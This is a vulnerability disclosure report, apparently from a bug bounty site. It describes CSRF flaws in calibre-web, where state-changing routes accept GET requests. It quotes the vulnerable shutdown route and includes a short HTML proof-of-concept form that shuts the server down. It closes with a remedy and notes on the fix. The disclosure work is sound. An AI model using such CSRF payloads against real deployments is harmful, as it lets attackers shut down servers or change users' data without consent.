Cross-Site Request Forgery (CSRF) in janeczku/calibre-web

Valid

Reported on

Dec 17th 2021


Description

CSRF on various endpoints

Summary

Pretty recently CSRF protection in calibre-web was implemented. However, there are some state-changing endpoints that accept GET requests instead of POST.

The most impactful route so far, that allows to completely shutdown the server:

@admi.route("/shutdown")
@login_required
@admin_required
def shutdown():
    task = int(request.args.get("parameter").strip())
    showtext = {}
    if task in (0, 1):  # valid commandos received
        # close all database connections
        calibre_db.dispose()
        ub.dispose()

        if task == 0:
            showtext['text'] = _(u'Server restarted, please reload page')
        else:
            showtext['text'] = _(u'Performing shutdown of server, please close window')
        # stop gevent/tornado server
        web_server.stop(task == 0)
        return json.dumps(showtext)

    if task == 2:
        log.warning("reconnecting to calibre database")
        calibre_db.reconnect_db(config, ub.app_DB_path)
        showtext['text'] = _(u'Reconnect successful')
        return json.dumps(showtext)`

And a bunch of low-impact CSRFs:

- Add a book to the shelf

@shelf.route("/shelf/add/<int:shelf_id>/<int:book_id>")

- Delete a shelf:

@shelf.route("/shelf/delete/<int:shelf_id>")

And so on, actually this file has plenty of endpoints without protection.

Proof of Concept

I'm leaving a PoC only for the first example as all payloads are almost the same:

// PoC.html
<form action="http://127.0.0.1:8083/shutdown" method="GET">
<input type="hidden" name="parameter" value="1"/>
<input type="submit" value="Shutdown"/>
</form>

Possible remediation

All requests that somehow change server/db state must be queried using POST method.

Impact

This vulnerability is capable of performing malicious actions in case victim visits attacker's website.

P.s.

I'm not sure that I found all vulnerable endpoints, so it's better to check all existing routes that allow to use GET.

Occurrences

Here I simply leave the whole file as it has lots of vulnerable endpoints

We are processing your report and will contact the janeczku/calibre-web team within 24 hours. 5 months ago
We have contacted a member of the janeczku/calibre-web team and are waiting to hear back 5 months ago
We have sent a follow up to the janeczku/calibre-web team. We will try again in 7 days. 5 months ago
janeczku validated this vulnerability 5 months ago
Scaramouche has been awarded the disclosure bounty
The fix bounty is now up for grabs
Scaramouche
4 months ago

Researcher


Could you please review this report as well? https://huntr.dev/bounties/499688c4-6ac4-4047-a868-7922c3eab369/

janeczku confirmed that a fix has been merged on 785726 4 months ago
The fix bounty has been dropped
admin.py#L132 has been validated
shelf.py#L0 has been validated
to join this conversation